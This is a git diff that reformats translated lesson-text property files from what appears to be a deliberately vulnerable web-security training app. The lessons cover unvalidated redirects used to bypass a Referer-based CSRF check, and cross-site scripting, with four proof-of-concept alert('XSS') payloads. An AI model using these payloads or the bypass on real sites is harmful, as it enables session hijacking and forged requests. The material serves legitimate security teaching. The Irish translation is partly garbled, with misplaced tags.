-challenge.description=To mark this lesson as complete, you must exploit this <a>Cross Site Request Forgery</a> vulnerability using an <a>Unvalidated Redirect</a> security risk. The CSRF protection that has been implemented in this function is insufficient and can be bypassed easily with an unvalidated redirect vulnerability. To protect against CSRF attacks the application is checking that the request's <a>Referer</a> HTTP header is from the same host name the application is running on. This is easily bypassed when the request originates from inside the application. When an unvalidated redirect is used, the Referer header will be the URL of the redirect page.
-challenge.description.function=The function vulnerable to unvalidated redirects is
-challenge.description.request=The request to mark this lesson as complete is 
-challenge.description.request.2=where the exampleId is a users TempId.
-challenge.description.id=Your temporary ID is
-challenge.description.admin.message=The administrator promises to go to any URL you send him. So please use the following form to send him something of interest!
-send.message.button=Send Message
-word.info.loading=Loading...
-generic.error=An Error Occurred: 
\ No newline at end of file
+title.question.unvalidated_redirects_forwards = What are Unvalidated Redirects and Forwards?
+
+paragraph.info.1 = Unvalidated redirects and forwards occur in applications that <a>redirect</a> or <a>forward</a> their users to a <a>target</a> that is specified by an unvalidated parameter. An unvalidated parameter that is used to redirect a user to a normally safe location can be used by an attacker to trick victims into visiting phishing pages or even have malware installed on their machines. 
+paragraph.info.2 = This attack takes advantage of a user's trust in an application. A victim is more likely to click on a link from a site that they trust than one they have never seen before.
+paragraph.info.3 = These attacks can also be used to bypass access control schemes. This is done when a page that a user would not normally have access to,such as <a>administrator</a> pages, is included in a unvalidated redirect.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = To mark this lesson as complete, you must exploit this <a>Cross Site Request Forgery</a> vulnerability using an <a>Unvalidated Redirect</a> security risk. The CSRF protection that has been implemented in this function is insufficient and can be bypassed easily with an unvalidated redirect vulnerability. To protect against CSRF attacks the application is checking that the request's <a>Referer</a> HTTP header is from the same host name the application is running on. This is easily bypassed when the request originates from inside the application. When an unvalidated redirect is used, the Referer header will be the URL of the redirect page.
+challenge.description.function = The function vulnerable to unvalidated redirects is
+challenge.description.request = The request to mark this lesson as complete is 
+challenge.description.request.2 = where the exampleId is a users TempId.
+challenge.description.id = Your temporary ID is
+challenge.description.admin.message = The administrator promises to go to any URL you send him. So please use the following form to send him something of interest!
+
+
+send.message.button = Send Message
+word.info.loading = Loading...
+generic.error = An Error Occurred: 
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
index 0a86f3fa9..9b2c248b8 100644
--- a/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
+++ b/src/main/resources/i18n/lessons/unvalidated_redirects_forwards/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f_zh.properties
@@ -1,15 +1,21 @@
-title.question.unvalidated_redirects_forwards=\u4EC0\u4E48\u662F\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1?
-paragraph.info.1=\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1,\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F<a>\u91CD\u5B9A\u5411</a>\u6216<a>\u8F6C\u53D1</a>\u4ED6\u4EEC\u7684\u7528\u6237\u5230\u4E00\u4E2A\u901A\u8FC7\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u7279\u5B9A\u7684<a>\u76EE\u6807</a>.\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u88AB\u7528\u4E8E\u91CD\u5B9A\u5411\u4E00\u4E2A\u7528\u6237\u5230\u4E00\u4E2A\u901A\u5E38\u5B89\u5168\u7684\u4F4D\u7F6E,\u8BE5\u4F4D\u7F6E\u662F\u53EF\u88AB\u653B\u51FB\u8005\u7528\u4E8E\u6B3A\u9A97\u53D7\u5BB3\u8005\u53BB\u8BBF\u95EE\u9493\u9C7C\u7F51\u9875\u6216\u6709\u6076\u610F\u8F6F\u4EF6\u5B89\u88C5\u5728\u4ED6\u4EEC\u7684\u673A\u5668\u4E0A\u7684.
-paragraph.info.2=\u8FD9\u79CD\u653B\u51FB\u5229\u7528\u7528\u6237\u5BF9\u5E94\u7528\u7A0B\u5E8F\u7684\u4FE1\u8D56. \u53D7\u5BB3\u8005\u66F4\u6709\u53EF\u80FD\u70B9\u51FB\u4E00\u4E2A\u4ED6\u4EEC\u4FE1\u8D56\u7684\u7AD9\u70B9,\u800C\u4E0D\u662F\u4E00\u4E2A\u4ED6\u4EEC\u4ECE\u672A\u89C1\u8FC7\u7684\u7AD9\u70B9\u7684\u94FE\u63A5.
-paragraph.info.3=\u8FD9\u4E9B\u653B\u51FB\u4E5F\u53EF\u4EE5\u88AB\u7528\u4E8E\u7ED5\u8FC7\u8BBF\u95EE\u63A7\u5236\u6A21\u5F0F.\u90A3\u4E9B\u666E\u901A\u7528\u6237\u901A\u5E38\u6CA1\u6709\u88AB\u6388\u6743\u8BBF\u95EE\u7684\u9875\u9762,\u6BD4\u5982<a>\u7BA1\u7406\u5458</a>\u9875\u9762,\u4E5F\u5DF2\u7ECF\u5B8C\u6210\u4E86\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u4F60\u5FC5\u987B\u5229\u7528<a>\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020(CSRF)</a>\u6F0F\u6D1E\u4F7F\u7528\u4E00\u4E2A<a>\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411</a>\u5B89\u5168\u98CE\u9669.CSRF\u4FDD\u62A4\u5DF2\u7ECF\u88AB\u5B9E\u73B0,\u5728\u8BE5\u51FD\u6570\u4E2D\u5DF2\u7ECF\u88AB\u8BBE\u7F6E\u6210\u4E0D\u5B8C\u5168\u7684,\u5E76\u53EF\u4EE5\u901A\u8FC7\u4F7F\u7528\u672A\u9A8C\u8BC1\u91CD\u5B9A\u5411\u6F0F\u6D1E\u8F7B\u6613\u7ED5\u8FC7.\u4E3A\u4E86\u9632\u6B62CSRF\u653B\u51FB\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6B63\u5728\u68C0\u67E5\u8BF7\u6C42\u7684<a>Referer</a> HTTP \u6807\u5934\u662F\u6765\u81EA\u4E00\u4E2A\u6B63\u5728\u8FD0\u884C\u7684\u7A0B\u5E8F\u7684\u76F8\u540C\u4E3B\u673A\u540D.\u5F53\u8BF7\u6C42\u4ECE\u7A0B\u5E8F\u5185\u59CB\u53D1,\u662F\u5F88\u5BB9\u6613\u7ED5\u8FC7\u7684.\u5F53\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u88AB\u4F7F\u7528\u65F6,\u8BE5Referer\u5934\u5C06\u91CD\u5B9A\u5411\u9875\u9762\u7684URL.
-challenge.description.function=\u6613\u88AB\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u653B\u51FB\u7684\u51FD\u6570\u662F
-challenge.description.request=\u6807\u5FD7\u8BE5\u8BFE\u7A0B\u662F\u5B8C\u6210\u72B6\u6001\u7684\u8BF7\u6C42\u662F
-challenge.description.request.2=\u5F53 exampleId \u662F \u7528\u6237\u7684 TempId.
-challenge.description.id=\u4F60\u7684\u6682\u65F6 ID \u662F
-challenge.description.admin.message=\u7BA1\u7406\u5458\u4FDD\u8BC1\u67E5\u770B\u4EFB\u4F55\u4F60\u53D1\u9001\u7ED9\u4ED6\u7684\u4FE1\u606F.\u8BF7\u7528\u4EE5\u4E0B\u8868\u683C\u7ED9\u4ED6\u53D1\u9001\u6709\u8DA3\u7684\u4E1C\u897F\u5427!
-send.message.button=\u53D1\u9001\u4FE1\u606F
-word.info.loading=\u52A0\u8F7D\u4E2D...
-generic.error=\u6709\u4E00\u4E2A\u9519\u8BEF: 
\ No newline at end of file
+title.question.unvalidated_redirects_forwards = \u4EC0\u4E48\u662F\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1?
+
+paragraph.info.1 = \u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1,\u53D1\u751F\u5728\u5F53\u5E94\u7528\u7A0B\u5E8F<a>\u91CD\u5B9A\u5411</a>\u6216<a>\u8F6C\u53D1</a>\u4ED6\u4EEC\u7684\u7528\u6237\u5230\u4E00\u4E2A\u901A\u8FC7\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u7279\u5B9A\u7684<a>\u76EE\u6807</a>.\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u53C2\u6570\u88AB\u7528\u4E8E\u91CD\u5B9A\u5411\u4E00\u4E2A\u7528\u6237\u5230\u4E00\u4E2A\u901A\u5E38\u5B89\u5168\u7684\u4F4D\u7F6E,\u8BE5\u4F4D\u7F6E\u662F\u53EF\u88AB\u653B\u51FB\u8005\u7528\u4E8E\u6B3A\u9A97\u53D7\u5BB3\u8005\u53BB\u8BBF\u95EE\u9493\u9C7C\u7F51\u9875\u6216\u6709\u6076\u610F\u8F6F\u4EF6\u5B89\u88C5\u5728\u4ED6\u4EEC\u7684\u673A\u5668\u4E0A\u7684.
+paragraph.info.2 = \u8FD9\u79CD\u653B\u51FB\u5229\u7528\u7528\u6237\u5BF9\u5E94\u7528\u7A0B\u5E8F\u7684\u4FE1\u8D56. \u53D7\u5BB3\u8005\u66F4\u6709\u53EF\u80FD\u70B9\u51FB\u4E00\u4E2A\u4ED6\u4EEC\u4FE1\u8D56\u7684\u7AD9\u70B9,\u800C\u4E0D\u662F\u4E00\u4E2A\u4ED6\u4EEC\u4ECE\u672A\u89C1\u8FC7\u7684\u7AD9\u70B9\u7684\u94FE\u63A5.
+paragraph.info.3 = \u8FD9\u4E9B\u653B\u51FB\u4E5F\u53EF\u4EE5\u88AB\u7528\u4E8E\u7ED5\u8FC7\u8BBF\u95EE\u63A7\u5236\u6A21\u5F0F.\u90A3\u4E9B\u666E\u901A\u7528\u6237\u901A\u5E38\u6CA1\u6709\u88AB\u6388\u6743\u8BBF\u95EE\u7684\u9875\u9762,\u6BD4\u5982<a>\u7BA1\u7406\u5458</a>\u9875\u9762,\u4E5F\u5DF2\u7ECF\u5B8C\u6210\u4E86\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u4F60\u5FC5\u987B\u5229\u7528<a>\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020(CSRF)</a>\u6F0F\u6D1E\u4F7F\u7528\u4E00\u4E2A<a>\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411</a>\u5B89\u5168\u98CE\u9669.CSRF\u4FDD\u62A4\u5DF2\u7ECF\u88AB\u5B9E\u73B0,\u5728\u8BE5\u51FD\u6570\u4E2D\u5DF2\u7ECF\u88AB\u8BBE\u7F6E\u6210\u4E0D\u5B8C\u5168\u7684,\u5E76\u53EF\u4EE5\u901A\u8FC7\u4F7F\u7528\u672A\u9A8C\u8BC1\u91CD\u5B9A\u5411\u6F0F\u6D1E\u8F7B\u6613\u7ED5\u8FC7.\u4E3A\u4E86\u9632\u6B62CSRF\u653B\u51FB\u8BE5\u5E94\u7528\u7A0B\u5E8F\u6B63\u5728\u68C0\u67E5\u8BF7\u6C42\u7684<a>Referer</a> HTTP \u6807\u5934\u662F\u6765\u81EA\u4E00\u4E2A\u6B63\u5728\u8FD0\u884C\u7684\u7A0B\u5E8F\u7684\u76F8\u540C\u4E3B\u673A\u540D.\u5F53\u8BF7\u6C42\u4ECE\u7A0B\u5E8F\u5185\u59CB\u53D1,\u662F\u5F88\u5BB9\u6613\u7ED5\u8FC7\u7684.\u5F53\u4E00\u4E2A\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u88AB\u4F7F\u7528\u65F6,\u8BE5Referer\u5934\u5C06\u91CD\u5B9A\u5411\u9875\u9762\u7684URL.
+challenge.description.function = \u6613\u88AB\u672A\u7ECF\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u653B\u51FB\u7684\u51FD\u6570\u662F
+
+challenge.description.request = \u6807\u5FD7\u8BE5\u8BFE\u7A0B\u662F\u5B8C\u6210\u72B6\u6001\u7684\u8BF7\u6C42\u662F
+challenge.description.request.2 = \u5F53 exampleId \u662F \u7528\u6237\u7684 TempId.
+challenge.description.id = \u4F60\u7684\u6682\u65F6 ID \u662F
+challenge.description.admin.message = \u7BA1\u7406\u5458\u4FDD\u8BC1\u67E5\u770B\u4EFB\u4F55\u4F60\u53D1\u9001\u7ED9\u4ED6\u7684\u4FE1\u606F.\u8BF7\u7528\u4EE5\u4E0B\u8868\u683C\u7ED9\u4ED6\u53D1\u9001\u6709\u8DA3\u7684\u4E1C\u897F\u5427!
+
+
+send.message.button = \u53D1\u9001\u4FE1\u606F
+word.info.loading = \u52A0\u8F7D\u4E2D...
+generic.error = \u6709\u4E00\u4E2A\u9519\u8BEF: 
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
index 049194f0c..7a0818248 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.properties
@@ -1,16 +1,16 @@
-title.question.xss=What is Cross Site Scripting (XSS)?
-paragraph.info.1=Cross-Site Scripting, or <a>XSS</a>, issues occur when an application uses <a>untrusted data</a> in a web browser without sufficient <a>validation</a> or <a>escaping</a>. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
-paragraph.info.2=Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application. 
-paragraph.info.3=According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of <a>attack vectors</a> that are available. The easiest way of showing an XSS attack executing is using a simple <a>alert box</a> as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same <a>alert</a> pop up that reads "XSS". 
-example.xss.1=&lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
-example.xss.2=&lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.3=&lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.4=&lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
-paragraph.whattodo.xss=The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
-paragraph.info.searchTerm=Please enter the <a>Search Term</a> that you want to look up
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = What is Cross Site Scripting (XSS)?
+paragraph.info.1 = Cross-Site Scripting, or <a>XSS</a>, issues occur when an application uses <a>untrusted data</a> in a web browser without sufficient <a>validation</a> or <a>escaping</a>. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
+paragraph.info.2 = Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application. 
+paragraph.info.3 = According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of <a>attack vectors</a> that are available. The easiest way of showing an XSS attack executing is using a simple <a>alert box</a> as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same <a>alert</a> pop up that reads "XSS". 
+example.xss.1 = &lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
+example.xss.2 = &lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.3 = &lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.4 = &lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
+paragraph.whattodo.xss = The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
+paragraph.info.searchTerm = Please enter the <a>Search Term</a> that you want to look up
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
index e5ad2dee1..c4d1b5c30 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_es.properties
@@ -1,16 +1,16 @@
-title.question.xss=¿Que es secuencia de comandos en sitios cruzados (XSS)?
-paragraph.info.1=Cross-Site Scripting, or <a>XSS</a>, issues occur when an application uses <a>untrusted data</a> in a web browser without sufficient <a>validation</a> or <a>escaping</a>. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
-paragraph.info.2=Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application. 
-paragraph.info.3=According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of <a>attack vectors</a> that are available. The easiest way of showing an XSS attack executing is using a simple <a>alert box</a> as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same <a>alert</a> pop up that reads "XSS". 
-example.xss.1=&lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
-example.xss.2=&lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.3=&lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.4=&lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
-paragraph.whattodo.xss=The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
-paragraph.info.searchTerm=Please enter the <a>Search Term</a> that you want to look up
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = ¿Que es secuencia de comandos en sitios cruzados (XSS)?
+paragraph.info.1 = Cross-Site Scripting, or <a>XSS</a>, issues occur when an application uses <a>untrusted data</a> in a web browser without sufficient <a>validation</a> or <a>escaping</a>. If untrusted data contains a client side script, the browser will execute the script while it is interpreting the page.
+paragraph.info.2 = Attackers can use XSS attacks to execute scripts in a victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. Anyone that can send data to the system, including administrators, are possible candidates for performing XSS attacks in an application. 
+paragraph.info.3 = According to OWASP, XSS is the most widespread vulnerability found in web applications today. This is partially due to the variety of <a>attack vectors</a> that are available. The easiest way of showing an XSS attack executing is using a simple <a>alert box</a> as a client side script pay load. To execute a XSS payload, a variety of an attack vectors may be necessary to overcome insufficient escaping or validation. The following are examples of some known attack vectors, that all create the same <a>alert</a> pop up that reads "XSS". 
+example.xss.1 = &lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
+example.xss.2 = &lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.3 = &lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.4 = &lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
+paragraph.whattodo.xss = The following search box outputs untrusted data without any validation or escaping. Get an alert box to execute through this function to show that there is an XSS vulnerability present.
+paragraph.info.searchTerm = Please enter the <a>Search Term</a> that you want to look up
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
index 3b371550d..d2a4160b7 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_ga.properties
@@ -1,16 +1,16 @@
-title.question.xss=Cád é Trasna Suíomh Script (XSS)?
-paragraph.info.1=Trasna Suíomh Script, nó <a>XSS</a>, tharlaíonn saincheisteanna nuair Úsáideann iarratas <a> </a> sonraí neamhiontaofa i bhrabhsálaí gréasáin gan dóthain </a> bailíochtaithe <a> nó <a> éalú </a>. Má tá na sonraí neamhiontaofa script taobh cliant, beidh an bhrabhsálaí fhorghníomhú an script cé go bhfuil sé ag léiriú an leathanach.
-paragraph.info.2=Is féidir le attackers a úsáid ionsaithe XSS chun scripteanna i bhrabhsálaí íospartach ar féidir a hijack seisiúin úsáideora fhorghníomhú, aghlot suímh ghréasáin, nó atreorú an t-úsáideoir le láithreáin mailíseach. Tá duine ar bith gur féidir sonraí a sheoladh chuig an gcóras, lena n-áirítear riarthóirí, iarrthóirí féideartha le haghaidh chomhlíonadh ionsaithe XSS in iarratas.
-paragraph.info.3=De réir OWASP, is é XSS an leochaileacht is forleithne le fáil i iarratais gréasáin lá atá inniu ann. Tá sé seo i bpáirt mar gheall ar an éagsúlacht na <a> </a> veicteoirí ionsaí atá ar fáil. An bealach is éasca a léiriú ionsaí XSS forghníomhaitheach go bhfuil baint úsáide as <a> simplí bosca foláirimh </a> mar ualach a íoc script taobh cliant. A fhorghníomhú pálasta XSS, féadfaidh éagsúlacht de veicteoirí ionsaí a bheith riachtanach a shárú nach leor éalú nó bailíochtú. Na samplaí de roinnt veicteoirí ionsaí ar a dtugtar iad seo a leanas, a chruthú go léir an airdeall <a> céanna </a> pop suas go léann "XSS".
-example.xss.1=&lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
-example.xss.2=&lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.3=&lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
-example.xss.4=&lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
-paragraph.whattodo.xss=Na haschuir bosca cuardaigh a leanas sonraí neamhiontaofa gan aon bhailíochtú nó éalú. Faigh bosca foláirimh a fhorghníomhú tríd an fheidhm seo a thaispeáint go bhfuil an leochaileacht XSS láthair.
-paragraph.info.searchTerm=Cuir isteach an <a>Téarma Cuardaigh</a> gur mian leat chun breathnú suas
-word.info.loading=Lódáil...
-sentence.question.wouldYouLikeHint=Ar mhaith leat leid?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.getUser=Get This User
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xss = Cád é Trasna Suíomh Script (XSS)?
+paragraph.info.1 = Trasna Suíomh Script, nó <a>XSS</a>, tharlaíonn saincheisteanna nuair Úsáideann iarratas <a> </a> sonraí neamhiontaofa i bhrabhsálaí gréasáin gan dóthain </a> bailíochtaithe <a> nó <a> éalú </a>. Má tá na sonraí neamhiontaofa script taobh cliant, beidh an bhrabhsálaí fhorghníomhú an script cé go bhfuil sé ag léiriú an leathanach.
+paragraph.info.2 = Is féidir le attackers a úsáid ionsaithe XSS chun scripteanna i bhrabhsálaí íospartach ar féidir a hijack seisiúin úsáideora fhorghníomhú, aghlot suímh ghréasáin, nó atreorú an t-úsáideoir le láithreáin mailíseach. Tá duine ar bith gur féidir sonraí a sheoladh chuig an gcóras, lena n-áirítear riarthóirí, iarrthóirí féideartha le haghaidh chomhlíonadh ionsaithe XSS in iarratas.
+paragraph.info.3 = De réir OWASP, is é XSS an leochaileacht is forleithne le fáil i iarratais gréasáin lá atá inniu ann. Tá sé seo i bpáirt mar gheall ar an éagsúlacht na <a> </a> veicteoirí ionsaí atá ar fáil. An bealach is éasca a léiriú ionsaí XSS forghníomhaitheach go bhfuil baint úsáide as <a> simplí bosca foláirimh </a> mar ualach a íoc script taobh cliant. A fhorghníomhú pálasta XSS, féadfaidh éagsúlacht de veicteoirí ionsaí a bheith riachtanach a shárú nach leor éalú nó bailíochtú. Na samplaí de roinnt veicteoirí ionsaí ar a dtugtar iad seo a leanas, a chruthú go léir an airdeall <a> céanna </a> pop suas go léann "XSS".
+example.xss.1 = &lt;script&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/script&gt;
+example.xss.2 = &lt;img src=&quot;&#x23;&quot; onerror=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.3 = &lt;input type=&quot;button&quot; onclick=&quot;<a>alert(&#39;XSS&#39;)</a>&quot; /&gt;
+example.xss.4 = &lt;iframe src=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/iframe&gt;
+paragraph.whattodo.xss = Na haschuir bosca cuardaigh a leanas sonraí neamhiontaofa gan aon bhailíochtú nó éalú. Faigh bosca foláirimh a fhorghníomhú tríd an fheidhm seo a thaispeáint go bhfuil an leochaileacht XSS láthair.
+paragraph.info.searchTerm = Cuir isteach an <a>Téarma Cuardaigh</a> gur mian leat chun breathnú suas
+word.info.loading = Lódáil...
+sentence.question.wouldYouLikeHint = Ar mhaith leat leid?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.getUser = Get This User
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
index 482faca44..d027e53eb 100644
--- a/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
+++ b/src/main/resources/i18n/lessons/xss/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a_zh.properties
@@ -1,18 +1,18 @@
-title.question.xss=\u4EC0\u4E48\u662F\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS)
-paragraph.info.1=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS) \u7684\u53D1\u751F\u662F\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5728 WEB \u6D4F\u89C8\u5668\u4E2D\u4F7F\u7528\u4E0D\u53EF\u9760\u7684\u6570\u636E\uFF0C\u6CA1\u6709\u8DB3\u591F\u7684<a>\u9A8C\u8BC1</a> \u6216 <a>\u8F6C\u4E49</a>.\u5982\u679C<a>\u4E0D\u53EF\u9760\u7684</a>\u6570\u636E\u5305\u542B\u5BA2\u6237\u7AEF\u7684\u4EE3\u7801,\u6D4F\u89C8\u5668\u5C06\u6267\u884C\u8BE5\u811A\u672C\uFF0C\u5F53\u5B83\u8BFB\u53D6\u8BE5\u9875\u9762\u65F6.
